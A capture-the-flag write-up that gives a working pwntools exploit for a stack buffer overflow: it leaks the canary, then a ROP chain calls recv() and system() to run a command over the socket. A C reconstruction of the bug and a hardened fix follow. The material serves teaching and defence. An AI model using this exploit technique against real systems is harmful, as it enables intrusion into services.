A typical BOF challenge. Leak the stack canary, use ROP to call system(), redirect the command's file descriptors to the socket, and read the flag.
Below is Exploit.py.
```python
# Python 2 / pwntools syntax (print statements, str payloads), as originally written.
from pwn import *

con = remote("192.168.0.14", 9191)      # local
#con = remote("110.10.212.130", 8888)   # codegate

def dummy():
    con.recvn(276)

def canary_leak():
    print "[*] Canary Leak"
    con.recvuntil("3. Exit\n")
    con.recvuntil("===============================\n")
    con.send("1\x00")
    con.recvuntil("Input Your Message : ")
    # 41 bytes: 40 fill the buffer, the trailing '\n' lands on the canary's
    # low (null) byte, so the echo keeps going past the buffer.
    con.sendline("A"*40)
    con.recvn(40)                       # the 40 'A's echoed back
    canary = con.recvn(4)[::-1]         # next 4 bytes: canary, little-endian -> reversed
    print "canary : " + hex(int(canary.encode("hex"), 16))
    return int(canary.encode("hex"), 16)

def ROP():
    canary = canary_leak()
    print "[*] ROP Stage"
    worker = 0x08048A71
    pop3ret = 0x8048eec
    system_plt = 0x8048620
    recv_plt = 0x80486e0
    bss = 0x804b1b4
    gadget = "/bin/ls 0>&4 1>&4\x00"    # command for system(); fd 4 is the client socket

    print "[*] Pre-Payload Send"
    con.recvuntil("3. Exit\n")
    con.recvuntil("===============================\n")
    con.sendline("1")
    con.recvuntil("Input Your Message : ")
    payload = ""
    payload += "A" * 40
    payload += p32(canary)              # leaked canary (low byte still '\n' at this point)
    payload += "B" * 12
    payload += p32(recv_plt)            # recv(4, bss, len(gadget), 0) -> writes the command into .bss
    payload += p32(pop3ret)
    payload += p32(0x04)                # socket
    payload += p32(bss)
    payload += p32(len(gadget))
    payload += p32(0x00)
    payload += p32(system_plt)          # system(bss)
    payload += p32(0x41414141)
    payload += p32(bss)
    con.sendline(payload)

    print "[*] Canary Null Inject"
    con.recvuntil("3. Exit\n")
    con.recvuntil("===============================\n")
    con.sendline("1")
    con.recvuntil("Input Your Message : ")
    # exactly 41 bytes via send(): restores the canary's low byte to 0x00
    payload = ""
    payload += "A" * 40
    payload += "\x00"
    con.send(payload)

    print "[*] Triggering"
    con.recvuntil("3. Exit\n")
    print con.recvuntil("===============================\n")
    con.sendline("3")                   # triggering: returning from the handler runs the chain
    con.sendline(gadget)                # consumed by the recv() in the chain
    con.interactive()

ROP()
```
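The canary leak above works because the echo runs past the end of the 40-byte buffer once the terminating null byte is gone. The following C is an added example, not the challenge binary's source (the write-up does not show it): it reconstructs the shape of bug the exploit relies on and puts the hardened handler beside it. The buffer size of 40, the function names and the sample message are assumptions chosen to match the offsets in the exploit script.

```c
/* Added example: assumed reconstruction of the bug class, not the real binary. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MSG_BUF 40   /* assumed: matches the 40-byte fill in the exploit */

/* Assumed vulnerable handler. Two defects feed the exploit:
 *   1. memcpy() copies in_len bytes into a 40-byte buffer (stack overflow);
 *   2. the echo length comes from strlen(buf). A 40-byte message plus '\n'
 *      leaves no NUL inside buf, and the '\n' replaces the canary's low byte
 *      (glibc keeps that byte at 0x00 precisely so string functions stop there),
 *      so the echo runs on into the canary and the saved registers.
 * Shown for reading; calling it with in_len >= MSG_BUF is undefined behaviour. */
size_t handle_message_vuln(const char *in, size_t in_len, char *out)
{
    char buf[MSG_BUF];
    memcpy(buf, in, in_len);          /* no bound check */
    size_t n = strlen(buf);           /* walks past buf if no NUL inside */
    memcpy(out, buf, n);
    return n;
}

/* Hardened handler: clamp the copy to the buffer, always NUL-terminate, and
 * echo exactly the bytes that were accepted, never a strlen() over the stack.
 * Returns the number of bytes written to out (at most out_cap). */
size_t handle_message_safe(const char *in, size_t in_len, char *out, size_t out_cap)
{
    char buf[MSG_BUF + 1];
    size_t n = in_len < MSG_BUF ? in_len : MSG_BUF;   /* drop the excess */
    memcpy(buf, in, n);
    buf[n] = '\0';                                    /* terminator always present */
    if (n > out_cap)
        n = out_cap;
    memcpy(out, buf, n);
    return n;
}

/* Constructed input in the shape the exploit sends: 40 'A's, a newline, then
 * filler standing in for a ROP chain. Returns 1 if the safe handler echoed
 * only the 40 accepted bytes and left everything after them untouched. */
int demo_safe_handler(void)
{
    char msg[64];
    memset(msg, 'A', 40);
    msg[40] = '\n';
    memset(msg + 41, 0x41, 23);       /* constructed placeholder for the overflow tail */
    char out[64];
    memset(out, 0xEE, sizeof out);    /* sentinel: must survive past byte 40 */
    size_t n = handle_message_safe(msg, sizeof msg, out, sizeof out);
    return n == 40 && out[40] == (char)0xEE;
}

int main(void)
{
    printf("safe handler echoes only the accepted 40 bytes: %s\n",
           demo_safe_handler() ? "yes" : "no");
    return 0;
}
```

The fix is the pairing of a clamped copy with an echo length derived from the bytes actually accepted; either half alone still leaves a leak or an overflow.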